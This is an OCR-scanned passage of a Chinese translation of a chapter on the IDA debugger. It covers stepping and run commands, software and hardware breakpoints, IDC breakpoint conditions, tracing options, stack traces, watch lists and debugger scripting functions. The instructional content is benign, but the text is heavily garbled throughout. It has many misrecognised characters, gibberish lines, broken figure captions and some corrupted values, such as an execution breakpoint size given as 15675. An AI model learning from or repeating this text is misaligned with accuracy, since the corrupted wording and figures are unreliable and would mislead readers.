所 有 调试 硕 最 重要 的 功能 都 是 它 能 够 严密 监控 并 修改 〈 如 有 必要 ) 它 所 调试 的 进程 的 
为 达到 这 一 目的 , 大 多 数 调 试 器 都 提供 了 各 种 命令 , 用 于 在 将 控制 权 转 交 给 调试 需 之 前 执行 一 
或 多 条 指令 。 这 些 命令 通常 与 断 点 结合 起 来 使 用 ， 用户 通 过 这 些 断 点 在 到 达 一 条 指定 的 指令 ， » 
满足 一 个 特定 的 条 件 时 中 上 断 进 程 。 

在 调试 器 的 控制 下 ,一 个 进程 的 基本 执行 过 程 通过 使 用 各 种 “ 单 步 执行 “ “继续 ”和 “运行 ” 
命令 来 完成 。 因 为 我 们 要 频 索 使 用 这 些 命 令 , 因此 熟悉 与 它们 有 关 的 工具 栏 按钮 和 热 键 组 合 将 对 
我 们 有 好 处 。 与 执行 进程 有 关 的 工具 栏 按钮 如 图 24-8 所 示 。 


- 终止 i 运行 至 光标 
CTRL-F2 F9 


P geng 


暂停 ZA 运行 至 返回 
F7 CTRL-F7 


图 24-8 ”调试 需 进 程控 制 工具 


下 面 我 们 描述 这 些 命令 的 行为 。 

口 继续 (Continue )。 继 续 执行 一 个 暂 保 的 进程 。 执 行将 继续 ， 和 直到 过 到 一 个 断 点 、 用 户 暂 
集 或 终止 执行 或 者 该 进程 日 行 终止 。 

O 暂停 (Pause )。 暂 停 一 个 正在 运行 的 进程 。 

口 终止 〈Terminate)。 终 止 一 个 正在 运行 的 进程 。 
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口 步 入 〈Step into)。 仪 执行 下 一 条 指令 。 如 果 下 一 条 指令 是 一 个 函数 调用 ， 则 在 目标 函数 
的 第 一 条 指令 上 停止 执行 ; 这 个 命令 叫做 “ 步 人 ”, 是 因为 程序 步 人 了 任何 被 调用 的 图 数 。 
Oi (Step over)。 仅 执行 下 一 条 指令 。 如 果 下 一 条 指令 是 一 个 困 数 调用 ， 则 将 该 调用 作 
为 一 条 指令 处 理 ， 函 数 返 回 时 立即 停止 执行 。 这 个 命令 叫做 “路 过 ”， 是 因为 执行 步骤 是 
跳 过 基数， 而 不 是 像 “ 步 和 ”一样 是 经 过 上 男 数 。 如 采 遇 到 一 个 断 点 ， 执 行 可 能 会 在 冰 数 调 
用 完成 前 中 汤 。 如 果 一 个 孔 数 的 行为 十 分 第 见 , 并 且 没 有 用 处 , 这 时 “器 过 ”就 非 第 有 用 ， 
使 用 它 可 以 节省 大 量 时 间 。 
口 运 行 至 返回 (Run Until Return)。 继 组 执行 当前 冰 数 ， 直 到 该 晒 数 返回 (或 遇 到 一 个 断 点 ) 
时 才 候 止 。 如 果 你 多 次 见 到 一 个 函数 并 希望 离开 它 , 或 者 如 果 你 无 意 则 进入 了 一 个 你 希望 
跨 过 的 站 数 ， 这 时 就 可 以 使 用 这 项 操作 。 
口 运行 至 光标 “Run to Cursor)。 继 续 执 行进 程 ， 直 到 执行 到 达 当 前 光标 位 置 (或 遇 到 一 个 
Wir ) 时 才 人 停止。 这 个 命令 用 于 运行 大 块 的 代码 ， 而 不 必 在 你 希望 暂停 的 每 个 位 置 设 置 一 
个 永久 性 的 断 点 。 请 注意 ， 如 果 光 标 位 置 被 跳 过 或 永远 无 法 到 达 ， 则 程序 可 能 不 会 暂停 。 
除了 工具 栏 和 热 键 外 ， 所 有 执行 控制 命令 还 可 以 通过 Debugger 亲 单 访问 。 无 论 进程 在 执行 
一 个 单 步 操 作 或 遇 到 一 个 断 点 后 是 否 暂停 ， 每 次 进程 暂 俘 ， 所 有 与 调试 肴 有 关 的 窗口 都 会 更 新 ， 
以 反映 该 进程 在 暂停 时 的 状态 (C CPU 寄存 器 、 标 志和 内 存 内 容 )。 




















24.3.1 HA 


Br EAR rt. EEATT E) RREH KAMA, EN TETE 
序 中 的 特定 位 置 中 断 正 在 执行 的 程序 。 在 某 种 程度 上 说 ， 汤 点 是 “运行 至 光标 ”这 个 概念 的 永久 
性 扩展 ， 因 为 在 一 个 给 定 的 地 址 上 设置 断 点 后 , 一 旦 执行 到 达 这 个 人 位置， 无论 光 标 是 否 仍 然 位 于 
这 个 位 置 ,执行 总 是 会 立即 中 断 。 不 过 ,虽然 执行 只 能 运行 到 一 个 光标 位 置 ， 但 我 们 却 可 以 在 整 
个 程序 中 设置 许多 断 点 ， 到 达 任 何 一 个 断 点 都 会 使 执行 中 断 。 在 DA 中 ,我们 通过 导航 到 你 希 
望 使 执行 暂停 的 位 置 来 设置 断 点 ， 或 使 用 F2 热 键 〈 或 右 击 并 选择 Add Breakpoint ) 设置 断 点 。 
已 经 设置 断 点 的 地 址 将 以 一 条 路 越 整个 反 汇 编 行 的 红 〈 默认 ) 带 突 出 显示 。 你 可 以 再 次 按 下 F2 
键 关 闭 一 个 断 点 ， 从 而 删除 它 。 你 可 以 通过 Debugger » Breakpoints » Breakpoint List 查看 程序 中 
MB C. ZEE ELI BT BT RS, o 

默认 情况 下 , IDA 会 使 用 软件 断 点 ,， 它 用 一 条 软件 断 点 指令 蔡 代 断 点 地 址 所 在 位 置 的 操作 码 
"EB. x86 二 进 制 文件 的 软件 断 点 指令 为 int 3 指令， 它 使 用 操作 人 码 值 0xCC。 正 稼 情况 下 ， 如 果 
执行 一 条 软件 断 点 指令 ， 操 作 系 统 会 将 控制 权 转 交 给 任何 监控 被 中 断 进 程 的 调试 希 。 如 第 21 3 
所 述 ， 模 糊 代 码 可 能 会 利用 软件 断 点 的 这 种 行为 来 阻止 任何 附加 的 调试 磊 的 正常 运行 。 

一 些 CPU( 如 x86, 具 体 为 386 及 更 高 版 本 ) 支 持 硬件 辅助 的 断 点 ( hardware-assisted breakpoint ) 
以 替代 软件 断 点 。 通 常 ， 硬 件 断 点 使 用 专用 的 CPU 寄存 器 配置 。 在 x86 CPU 中 ， 这 些 寄存 器 叫 
做 DR0-7 (调试 寄存 器 0~ 7 )。 使 用 x86 寄存 器 DRO-3, 最 多 可 以 指定 4 个 硬件 断 点 。 剩 下 的 x86 
调试 寄存 硕 用 于 指定 每 个 断 点 的 其 他 限制 。 如 末 司 用 了 一 个 便 件 断 点 , 也 就 没有 必要 蔡 换 被 调试 
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的 程序 中 的 某 条 特殊 指令 。CPU 会 根据 调试 寄存 器 中 包含 的 值 ， 决 定 是 否 应 中 断 执行 。 

设置 一 个 断 点 后 ， 你 可 以 修改 它 行 为 的 各 个 方面 。 除 简单 地 中 断 进 程 外 , (elt Aert Schr 
条 件 断 点 〈conditionalbreakpoint ) 的 概念 ， 用 户 可 指定 一 个 条 件 ， 在 实践 断 点 之 前 ， 这 个 条 件 必 
须 得 到 满足 。 如 果 到 达 了 这 样 一 个 断 点 ， 而 相关 的 条 件 没 有 得 到 满足 ， 调 试 顺 会 日 动 继续 执行 相 
关 程 序 。 这 样 做 的 总 体 想 法 是 : 相关 条 件 会 在 将 来 的 某 个 时 候 得 到 满足 ， 因 此 ， 只 有 当 你 感 兴 
的 条 件 得 到 满足 时 ， 程 序 才 会 中 断 。 

IDA 调试 带 文 持 条 件 断 点 和 硬件 断 点 。 要 修改 一 个 断 点 的 默认 (无 条 件 的 基于 软件 的 ) 行 为 ， 
你 必须 在 设置 断 点 后 对 它 进 行 编辑 。 要 访问 “ 靳 点 编辑 ”对 话 框 ， 你 必须 右 击 一 个 现 有 的 汤 点 ， 
并 在 出 现 的 菜单 中 选择 Edit Breakpoint。 得 到 的 “上 断 点 设置 ”对 话 框 如 图 24-9 所 示 。 

















à Breakpoint settings ] AX] 
Location [ ox4010ED 了 | 
Condition | -] 


[ Refresh debugger memory 


[^ Lowlevel condition 





图 24-9 “WREE XE 





Location Eis E nE es Abh, m Enabled 复 选 框 说 明 该 断 点 当前 是 否 处 于 活动 状态 。 
如 果 一 个 断 点 被 禁用 ， 无 论 哪 个 与 该 断 点 有 关 的 条 件 得 到 满足 ， 该 断 点 都 不 会 被 实践 。Hardware 
复 选 框 用 于 请 求 以 硬件 断 点 ( 而 非 软 件 断 点 ) 实现 该 断 点 。 


sa pnugaggaunangaginunggnguaa4nandtutndrndteditt Ae. 
IDAQ0 00000 4000000000000U0000 400000011 
UUUDUUUUD 


在 指定 一 个 硬件 断 点 时 ， 你 必须 使 用 Hardware 单 选 按钮 指定 断 点 的 行为 : 是 执行 则 中 断 、 
写 人 则 中 断 ， 还 是 读 取 / 写 入 则 中 断 。 后 两 类 行为 《 写 入 则 中 断 和 读 取 / 写 信 则 中 断 ) 可 以 创建 一 
类 特殊 的 断 点 ， 它 们 只 有 在 某 个 特定 的 内 存 位 置 (通常 为 一 个 数据 位 置 ) 被 访问 时 才 会 触发 ， 而 
不 论 访问 发 生 时 到 奔 执 行 的 是 什么 指令 。 如 来 你 更 感 兴趣 的 是 程序 何 时 访问 一 组 数据 ,而 不 是 这 
些 数据 在 什么 地 方 被 访问 ， 那 么 这 类 晰 点 就 非常 有 用 。 











24.3 ”进程 控制 419 


除了 为 便 件 断 点 指定 一 种 模式 外 , 你 还 必须 指定 一 个 大 小 。 执 行 类 断 点 的 大 小 必须 为 15675, 
写 和 人 类 或 读 取 / 写 和 人 类 断 点 的 大 小 可 以 设置 为 1、2 或 4 字 节 。 如 果 将 大 小 设置 为 2 字 节 ， 则 上 断 点 
的 地 址 必须 为 字 对 齐 〈2 字 节 的 整数 倍 )。 同 样 ，4 字 节 断 点 的 地 址 必须 为 双 字 对 齐 (4 字 市 的 整 
数 倍 )。 人 硬件 断 点 的 大 小 和 它 的 地 址 共同 构成 了 触发 这 类 上 断 点 的 地 址 范围 。 下 面 举例 说 明 。 以 在 
地 址 0804C834h 处 设置 的 一 个 4 字 世 写 人 式 断 点 为 例 ， 这 个 断 点 将 由 1379 A. 0804C837n、2 字 
WEA 0804C836h. 4 FHESA 0804C832h 等 操作 和 触发。 在 上 述 情形 中 ，0804C834h 与 0804C837h 
间 至 少 有 一 个 字 节 被 写 人 。 有 关 x86 硬件 断 点 行为 的 更 多 信息 ， 请 参阅 Intel 64 and 1A-32 
Architectures Software Developer ' s Manual, Volume 3B: System Programming Guide, Part 2", 

Tr "Bird ET OW BEER Condition 输入 框 中 提供 一 个 表达 式 ， 即 可 创建 条 件 断 点 。 条 件 断 
点 是 一 种 调试 器 特性 ， 而 不 是 一 种 指令 集 或 CPU 特性 。 如 果 一 个 断 点 被 触发 ， 这 时 调试 器 将 对 
任何 相关 的 条 件 表达 式 求 值 ， 决 定 是 应 暂停 程序 (条件 得 到 满足 )， 还 是 继续 执行 程序 〈 条 件 未 
满足 )。 因 此 ， 你 可 以 为 软件 和 人 硬件 断 点 指定 条 件 。 

IDA ir SEI HI IDC ( 而 非 Python ) 表达 式 指 定 。 值 为 非 零 的 表达 式 被 视 为 真 ， 它们 满足 
呆 点 条 件 并 触发 断 点 。 值 为 零 的 表达 式 被 视 为 假 ， 它 们 无 法 满足 断 点 条 件 ， 因 而 无 法 触发 相关 斯 
点 。 为 了 便于 创建 断 点 表达 式 ，IDA 提供 了 一 些 特殊 的 寄存 需 变 量 ， 用 于 直接 访问 断 点 表达 式 中 
的 寄存 需 内 容 。 这 些 变 量 以 寄存 闫 本身 的 名 称 命名 ， 包 括 EAX, EBX, ECX, EDX, ESI, EDI, EBP, 
ESP, EFL, AX, BX, CX, DX, SI, DI, BP, SP, AL, AH, BL, BH, CL, CH, DL 和 DH。 只 有 调试 器 
激活 时 ， 才 能 访问 这 些 寄存 着 变量 。 

但 是 ， 并 没有 可 用 于 访问 处 理 需 标志 位 的 变量 。 要 访问 CPU 标志 ， 你 需要 调用 DC 的 
GetRegValue 函数 ， 获 得 其 相关 标志 位 的 值 ， 如 CF。 如 果 你 需要 了 解 可 用 的 寄存 器 和 标志 名 称 ， 
请 参考 “通用 寄存 带 ” 窗 口 左右 边缘 的 标记 。 断 点 表达 式 的 一 些 示 例如 下 所 示 : 
























































EAX == 100 // break if eax holds the value 100 

ESI » EDI // break if esi is greater than edi 

Dword(EBP-20) -- 10 // Read current stack frame (var 20) and compare to 10 
GetRegValue("ZF") // bxeak if zero flag is set 

EAX = 1 // Set EAX to 1, this also evaluates to true (non-zero) 
EIP - 0x0804186C // Change EIP, perhaps to bypass code 





Trek, NARIBUS Et "B. MRH IDC 函数 访问 进程 信息 ( 只 要 

该 函数 返回 一 个 值 ); 第 二 ， 在 进程 执行 过 程 中 ， 你 可 以 通过 赋值 的 方式 修改 特定 位 置 的 寄存 带 

值 。 在 一 个 重 写 函数 返回 值 的 例子 "中 ，Ilfak 亲自 说 明了 这 个 技巧 。 24 — 
在 “ 断 点 设置 ”对 话 框 中 ， 最 后 一 个 可 以 配置 的 断 点 选项 是 对 话 框 右 侧 的 Action f£, Break 

复 选 框 指定 在 到 达 断 点 时 ， 是 否 应 暂停 执行 程序 (假设 相关 的 条 件 均 为 真 )。 OI P Az PBSE 

的 断 点 , 这 种 做 法 并 不 多 见 。 但 是 , 如 果 你 希望 在 每 次 到 达 一 条 指令 时 修改 某 个 内 存 或 寄存 融 值 ， 

















(D 参见 http://www.intel.com/products/processor/manuals/。 
(2 参见 http://www.hexblog.com/2005/11/simple trick to hide ida debug.html 和 http://www.hexblog.com/2005/11/stealth ` 
plugin 1.html。 
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而 又 不 希望 在 这 时 暂停 程序 ， 那 么 你 就 可 以 创建 不 会 中 断 的 断 点 。 如 果 选 择 Trace KENE, Wi 
次 触发 断 点 时 ， 都 会 记录 一 个 跟踪 事件 。 


24.3.2 IRER 


跟 踩 是 一 种 记录 方法 , 用 于 记录 一 个 进程 在 执行 过 程 中 发 生 的 特定 事件 。 跟踪 事件 被 记录 到 
一 个 固定 大 小 的 跟 踊 缓冲 区 中 , 或 记录 到 一 个 跟踪 文件 中 。 跟踪 分 为 两 类 : FO RE A RURE o 
如 果 启 用 指令 跟踪 ( Debugger >» Tracing » Instruction Tracing ), IDA 将 记录 被 指令 更 改 的 地 址 、 指 
令 和 任何 寄存 硕 〈(EIP 除外 ) 的 伍 。 指 令 跟踪 将 大 大 减 慢 被 调试 进程 的 执行 速度 ， 因 为 调试 硕 必 
须 单 步 执 行 这 个 进程 ， 以 监视 和 记录 所 有 寄存 融 的 值 。 函 数 跟 踪 (Debugger » Tracing » Function 
Tracing ) 是 指令 跟踪 的 一 个 子 集 ， 它 仪 记录 函数 调用 ( 并 选择 性 地 记录 返回 值 )， 而 不 记录 寄存 
a TH o 

跟踪 事件 也 分 为 3 类 : 写 人 跟踪 事件 、 读 取 / 写 和 人 跟踪 事件 和 执行 跟踪 事件 。 顾 名 思 义 ， 它 
们 分 别 代 表 在 某 个 指定 的 地 址 发 生 一 项 特定 的 操作 时 记录 的 一 类 跟踪 事件 。 这 些 跟踪 是 在 设置 
trace 选项 的 前 提 下 使 用 非 中 断 断 点 实现 的 。 写 入 跟踪 和 读 取 / 写 和 人 跟踪 使 用 硬件 断 点 实现 ,因此 
它 受 到 与 前 面 提 到 的 便 件 断 点 相同 的 限制 , 更 重要 的 是 , 任何 时 候 都 不 能 有 4 个 以 上 的 硬件 辅助 
的 断 点 或 跟踪 处 于 活动 状态 。 默 认 情 况 下 ， 执 行 跟踪 使 用 软件 断 点 实现 ， 因 此 一 个 程序 可 以 设置 
的 执行 跟 踩 的 数量 并 无 限制 。 

用 于 配置 调试 大 跟踪 操作 的 “跟踪 选项 ”( Tracing options ) 对 话 框 ( Debugger >» Tracing » 
Tracing options ) 如 图 24-10 所 示 。 


x 
Trace buffer sze [io — — | 
Trace file | | 
Stop conditior | | 


Trace window 
[ Mark consecutive traced events with same IP 


Tracing 
[v Trace over debugger segments 


























M Trace over library functions 


Instructions tracing 
[ Logifsams IP 


Functions traang 
[v Log returr instructions 


cancel | — rep 





图 24-10 “跟踪 选项 ”对 话 框 
这 里 指定 的 选项 仅 适 用 于 晒 数 和 指令 跟踪 。 这 些 选 项 对 于 各 个 跟踪 事件 不 会 造成 影响 。Trace 
buffer size 选项 指定 在 任何 给 定 的 时 刻 显 示 的 跟踪 事件 的 最 大 数量 。 对 于 给 定 的 缓冲 区 大 小 n, 
则 显示 最 近 发 生 的 n 个 跟踪 事件 。 合 名 一 个 日 志文 件 ， 则 所 有 跟踪 事件 将 附加 到 这 个 文件 后 面 。 
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在 指定 日 志文 件 时 , 并 没有 文件 对 话 框 显 示 出 来 , 因此 , 你 必须 目 己 指定 该 日 志文 件 的 完整 路 径 。 
你 可 以 输入 一 个 IDC 表达 式 作 为 “停止 条 件 ”。 在 跟踪 每 条 指令 之 前 ， 调 试 咒 会 对 这 个 表达 式 求 
值 。 如 果 表 达 式 的 值 为 真 ， 执 行 会 立即 暂停 。 这 个 表达 式 充 当 一 个 与 任何 特定 的 位 置 无 关 的 条 件 
ir. 
如 果 选 中 Mark consecutive traced events with same IP. (标明 IP 相同 的 连续 跟 踊 事件 ) 选项 ， 

则 使 用 一 个 等 号 标明 源 自 同一 条 指令 (这 里 的 IP 表示 指令 指针 ) 的 连续 跟 跨 事件 。 源 自 同 一 个 
指令 地 址 的 连续 事件 大 多 与 使 用 x86 REP 前 绥 的 指令 有 关 。 为 便于 一 个 指令 跟踪 显示 它 在 同一 个 
指令 地 址 处 的 每 次 重复 ， 还 必须 选中 Log if same IP( 如 果 IP 相同 则 记录 ) 选项 。 如 采 不 选择 这 
个 选项 ,， 则 每 次 遇 到 以 REP 为 前 绥 的 指令 时 ， 该 指令 仅 列 出 一 次 。 下 面 显示 的 是 一 个 指令 跟 踩 的 
部 分 结 有 末 ， 该 跟踪 使 用 的 是 默认 跟踪 设置 : 

















Thread Address Instruction Result 
@ 00000150 .text:sub 401320417 rep movsb ECX-00000000 ESI-0022FE2C EDI-0022FCF4 
00000150 .text:sub 401320419 pop esi ESI-00000000 ESP-0022FCEA 


请 注意 ，movsb 指令 ( @ ) 仅 列 出 一 次 。 
在 下 面 的 代码 中 ， 选 择 了 Logifsame IP 选项 ， 因 此 rep 循环 的 每 次 重复 都 被 记录 下 来 : 


Thread Address Instruction Result 

000012AC .text:sub 401320+17 rep movsb ECX-0000000B ESI-0022FE21 EDI-0022FCE9 EFL-00010206 RF-1 
000012AC .text:sub 401320417 rep movsb ECX-0000000A ESI-0022FE22 EDI-0022FCEA 

000012AC .text:sub 401320417 rep movsb ECX-00000009 ESI-0022FE23 EDI-0022FCEB 

000012AC .text:sub 401320417 rep movsb ECX-00000008 ESI-0022FE24 EDI-0022FCEC 

000012AC .text:sub 401320417 rep movsb ECX-00000007 ESI-0022FE25 EDI-0022FCED 

000012AC .text:sub 401320417 rep movsb ECX-00000006 ESI-0022FE26 EDI-0022FCEE 

000012AC .text:sub 401320417 rep movsb ECX-00000005 ESI-0022FE27 EDI-0022FCEF 

000012AC .text:sub 401320417 rep movsb ECX-00000004 ESI-0022FE28 EDI-0022FCFO 

000012AC .text:sub 401320417 rep movsb ECX-00000003 ESI-0022FE29 EDI-0022FCF1 

000012AC .text:sub 401320417 rep movsb ECX-00000002 ESI-0022FE2A EDI-0022FCF2 

000012AC .text:sub 401320417 rep movsb ECX-00000001 ESI-0022FE2B EDI-0022FCF3 

000012AC .text:sub 401320417 rep movsb ECX-00000000 ESI-0022FE2C EDI-0022FCF4 EFL-200000206 RF=0 
000012AC .text:sub 401320419 pop esi ESI-00000000 ESP-0022FCEA 


最 后 ， 在 下 面 的 代码 中 ， 选 择 了 Mark consecutive traced events with same IP m, Kk, H 
中 的 特殊 标记 体现 了 一 个 事实 ， 即 不 同 指令 之 间 的 指令 指针 并 未 发 生变 化 。 





Thread ` Address Instruction Result 

000017AC .text:sub 401320417 Tep movsb ECX20000000B ESI-20022FE21 EDI-0022FCE9 EFL-200010206 RF=1 
= = = ECX=0000000A ESI=0022FE22 EDI=0022FCEA 

ECX=00000009 ESI=0022FE23 EDI=0022FCEB 





(D REP 前 级 是 一 个 指令 修饰 符 ， 它 会 根据 ECX Aa P TP TTE RER x86 字符 串 指 令 ， 如 movs 和 scas。 
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000017AC .text:sub 401320+19 pop esi 


ECX-00000008 
ECX-00000007 
ECX-00000006 
ECX-00000005 
ECX-00000004 
ECX-00000003 
ECX-00000002 
ECX-00000001 
ECX-00000000 
ESI-00000000 


ESI-0022FE24 
ESI-0022FE25 
ESI-0022FE26 
ESI-0022FE27 
ESI-0022FE28 
ESI-0022FE29 
ESI-0022FE2A 
ESI-0022FE2B 
ESI-0022FE2C 
ESP-0022FCEA 


EDI-0022FCEC 
EDI-0022FCED 
EDI-0022FCEE 
EDI-0022FCEF 
EDI-0022FCFO 
EDI-0022FCF1 
EDI-0022FCF2 
EDI-0022FCF3 
EDI-0022FCF4 EFL-200000206 RF=0 


下 面 我 们 将 讨论 有 关 跟 踪 的 最 后 两 个 选项 : Trace over debugger segments ( FRE ES EE VS Aa 
段 ) 和 Trace over library functions ( WRC TJEK% )。 选 中 前 者 时 ， 只 要 跟踪 过 到 一 个 程序 段 ， 
日 该 段 在 最 初 加 载 到 IDA 中 的 任何 二 进 制 文件 段 以 外 ， 则 指令 和 函数 调用 跟 踩 将 被 临时 蔡 用 。 





在 这 方面 , 调用 共有 至 库 孙 数 是 一 





个 最 典型 的 例子 。 选 中 后 者 时 , 任何 时 候 如 采 执 行进 入 一 个 IDA 


已 经 识别 为 库 函 数 ( 可 能 通过 FLIRT 签名 匹配 识别 ) 的 函数 ， 则 函数 和 指令 跟 踩 将 被 临时 蔡 用 。 
链接 到 一 个 二 进 制 文件 的 库 函 数 ， 不 能 与 一 个 二 进 制 文 件 通 过 DLL 之 类 的 共 至 库 文件 访问 的 库 
胃 数 相 寓 消 。 移 认 情 次 下 ,这 两 个 选项 都 处 于 选中 状态 ， 这 明显 改善 了 跟踪 的 性 能 〈 Di um op 
不 需要 步 入 库 代 码 )， 并 大 大 减少 了 所 生成 的 跟踪 事件 的 数量 ， 因 为 进入 库 代 码 的 指令 跟踪 会 迅 
速 填 满 跟踪 缓冲 区 。 








24.3.3 Re 


栈 跟 踪 ( stack trace ) 显示 的 是 当前 调用 栈 或 函数 调用 序列 ， 这 些 调用 是 为 了 使 执行 到 达 二 
进 制 文件 中 的 一 个 特定 位 置 。 使 用 Debugger » Stack Trace 命令 生成 的 一 个 样本 栈 跟 踪 如 图 24-11 
所 示 O 











i printf+0x18 
main +0x8 
— lmainCRAT5lar lup+0xF5 


kernel32.dll:kernel32 BaseThreadInitThunk +10 
sub 770437CE 
ntdll.dll:ntdil RtInitialiseExceptionchain +BD 





Line 1of6 


K|24-11 栈 跟 踊 样 本 


栈 跟 踊 的 最 上 面 一 行列 出 当前 正在 执行 的 函数 名 称 。 第 二 行 指出 调用 当前 函数 的 函数 ,以 及 
做 出 该 调用 的 地 址 。 下 面 的 行 则 指出 调用 每 一 个 函数 的 地 址 。 调试 絮 可 以 通过 遍历 栈 并 解析 它 遇 
到 的 每 一 个 栈 帧 ， 从 而 创建 一 个 栈 跟踪 窗口 。IDA 调试 器 依靠 帧 指针 寄存 器 (x86 的 EBP ) 的 内 
容 来 定位 每 个 栈 帧 的 基 址 。 定 位 一 个 栈 由 后， 调试 器 可 以 提取 出 一 个 指向 下 一 个 栈 帧 的 指针 ( 保 
存 的 帧 指针 )， 以 及 保存 的 返回 地 址 ， 并 使 用 这 个 地 址 定位 用 于 调用 当前 函数 的 调用 指令 。IDA 
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调试 希 无 法 跟踪 不 使 用 EBP 作为 帧 指针 的 栈 帧 。 在 函数 〈 而 非 各 指令 ) 层次 上 ， 栈 跟踪 用 于 回 
答 以 下 问题 :“ 我 如 何 到 达 这 里 ? ”或 者 更 准确 地 说 ,“ 到 达 这 个 位 置 需要 调用 哪些 辆 数 ? ” 








24.3.4 ”上 监视 


调试 进程 时 , 你 需要 持续 监视 一 个 或 几 个 变量 中 的 值 。 你 不 需要 在 每 次 进程 暂停 时 都 导航 到 
相关 的 内 存 位 置 , 许多 调试 带 都 能 让 你 指定 内 存 位 置 列表 ,每 次 进程 在 调试 带 中 和 暂 俘 ,， 这些 内 存 
位 置 的 值 都 将 显示 出 来 。 这 样 的 列表 叫做 监视 列表 《watch list )， 因 为 它们 可 用 于 在 程序 执行 过 
程 中 监视 指定 内 存 位 置 内 容 的 变化 情况 。 使 用 监视 列表 只 是 为 了 便于 导航 , 它们 不 能 像 断 点 一 样 
使 执行 暂 集 。 

为 监视 的 对 象 主要 为 数据 , 所 以 监视 点 (指定 要 监视 的 地 址 ) 通 常设 置 在 二 进 制 文件 的 栈 、 
堆 或 数据 区 块 。 在 IDA 调试 关中 ,你 可 以 通过 右 击 革 个 内 存 项 ， 然 后 选择 Add Watch， 从 而 设置 
监视 点 。 确定 要 监视 的 地 址 可 能 需要 费 点 功夫 。 相 比 于 确定 本 地 变量 的 地 址 ,确定 全 局 变量 的 地 
址 要 相对 简 香 一 些 ， 因 为 全 局 变量 在 编译 时 分 配 有 固定 的 地 址 。 为 一 方面 ， 在 运行 时 之 前 ,本 地 
变量 并 不 存在 ， 即 使 它们 存在 ,也 只 是 在 声明 它们 的 函数 被 调用 时 存在 。 激 活 调 试 带 后 ， 只 要 你 
JA rm. IDA 束 能 够 报告 该 函数 中 本 地 变量 的 地 址 。 将 鼠标 放 在 一 个 名 为 arg_0 的 本 地 变 
量 〈 实 际 上 为 传递 给 该 函数 的 一 个 参数 ) 上 的 结果 如 图 24-12 所 示 。 




















esi, esi 
[ebprarg 0], esi 
al 





图 24-12 (ët oe lr A LAE tg HE 


双击 活动 函数 中 的 本 地 变量 ，IDA 将 从 主 IDA. 窗口 跳 转 到 该 本 地 变量 的 地 址 。 到 达 该 变量 
的 地 址 后 ， 你 就 可 以 使 用 Add Watch ( 添加 监视 ) 上 下 文 菜 单项 对 该 地 址 添加 监视 不过， 你 需 
要 在 Watch Address (监视 地 址 ) 对 话 框 中 手动 输入 该 地 址 。 如 果 你 命名 了 该 内 存 位 置 ， 并 且 对 
其 名 称 而 不 是 地 址 应 用 上 述 亲 单项 ， 则 IDA 会 目 动 添加 监视 。 

所 有 监视 点 可 以 通过 Debugger » Watches » Watch List 访 问 。 在 监视 列表 中 , 选择 你 想 要 删除 
的 监视 点 并 按 下 DELETE， 即 可 删除 监视 点 。 
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在 第 15 章 ~ 第 19 章 中 ， 我 们 讨论 了 IDA 脚本 和 IDA SDK 的 基础 知识 ， 并 说 明了 这 些 功 能 
在 静态 分 析 二 进 制 文 件 时 的 作用 。 当 你 启动 一 个 进程 ,并且 在 调试 右 这 样 更 加 动态 的 环境 中 工作 
时 ,脚本 和 插件 仍然 能 够 发 挥 重要 的 作用 。 脚 本 和 插件 的 自动 化 应 用 包括 : 在 调试 进程 时 分 析 运 
行 时 数据 ， 执 行 复 杂 的 断 点 条 件 ， 采 取 措 施 破坏 反 调 试 技巧 。 
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24.4.1 为 调试 器 操作 编写 脚本 


在 使 用 IDA 调试 器 时 , 我 们 在 第 15 章 讨论 的 IDA 脚本 功能 仍然 有 效 。 脚 本 可 以 通过 File X 
单 启动 ， 与 热 键 关 联 ， 由 DA 的 脚本 命令 行 调用 。 此 外 ， 断 点 条 件 和 跟 踊 终止 表达 式 也 可 以 引 
用 用 户 创建 的 IDA 函数 。 

基本 的 脚本 也 数 可 以 设置 、 修 改 和 枚 举 断 点 , 读 取 和 写作 寄存 带 与 内 存 值 。 内 存 访问 功能 
DbgByte 、PatchDbgByte、DbgWord、PatchDbgWord、DbgDword 和 PatchDbgDword 函数 提供 ( 类似 于 
第 15 章 中 描述 的 Byte, Word, Dword 和 PatchXXX 函数 )。 寄 存 器 和 断 点 操作 由 以 下 函数 ( 请 参阅 
IDA 帮助 文件 了 解 全 部 函数 ) 实现 。 

口 long GetRegValue(string reg)。 如 前 所 述 , 返回 已 命名 寄存 需 的 值 , 如 EAX。 只 有 在 IDC 
中 ， 寄 存 需 的 值 还 可 以 通过 在 IDC 表达 式 中 使 用 该 寄存 需 的 名 称 来 访问 。 

D bool SetRegValue(number val, string name)。 返 回 已 命名 寄存 需 的 值 ， 如 EAX。 如 果 正 
在 使 用 IDC， 通 过 使 用 赋值 语句 左 侧 的 相关 寄存 磊 名 称 ， 你 还 可 以 修改 寄存 右 值 。 

D bool AddBpt(long addr)。 在 指定 的 地 址 添加 一 个 软件 断 点 。 

OQ bool AddBptEx(long addr, long size, long type)。 在 指定 的 地 址 添加 一 个 指定 大 小 和 类 
型 的 断 点 。 断 点 类 型 应 为 idc.idc 或 IDA 帮助 文件 中 描述 的 一 个 BPT XXX 常量 。 

D bool DelBpt(long addr)。 删 除 指定 地 址 处 的 一 个 断 点 。 

O long GetBptQty()。 返 回 在 程序 中 设置 的 断 点 的 总 数 。 

O long GetBptEA(long bpt num)。 返 回 指定 断 点 所 在 的 地 址 。 

O long/string GetBptAttr(long addr, number attr)。 返 回 与 指定 地 址 处 的 断 点 有 关 的 一 个 
业 点 属性 。 根 据 你 请 求 的 属性 值 ， 返 回 值 可 能 为 一 个 数字 或 字符 串 。 使 用 idc.idc 文件 或 
者 IDA 帮助 文件 描述 的 一 个 BPTATTR_XXX 值 可 指定 属性 。 

D bool SetBptAttr(long addr, number attr, long value)。 将 指定 断 点 的 指定 属性 设置 为 
指定 值 。 不 要 使 用 这 个 函数 设置 断 点 条 件 表达 式 ( 而 应 使 用 SetBptCnd 设置 )。 

O bool SetBptCnd(long addr, string cond)。 将 断 点 条 件 设置 为 所 提供 的 条 件 表 达 式 ， 这 
个 表达 式 必 须 为 一 个 有 效 的 IDC 表达 式 。 

口 long CheckBpt(long addr) 获 取 指 定位 置 的 断 点 状态 。 返 回 值 指 示 是 否 没 有 断 点 ， 是 否 已 
禁用 上 断 点 ， 是 否 已 启用 断 点 或 断 点 是 否 处 于 活动 状态 。 活 动 断 点 指 在 调试 需 也 处 于 活动 
状态 时 启用 的 断 点 。 

下 面 的 脚本 说 明 如 何在 当前 光标 位 置 安装 一 个 自 定 义 的 IDC 断 点 处 理 函 数 : 


























#include «idc.idc» 
/* 
* The following should return 1 to break, and 0 to continue execution. 
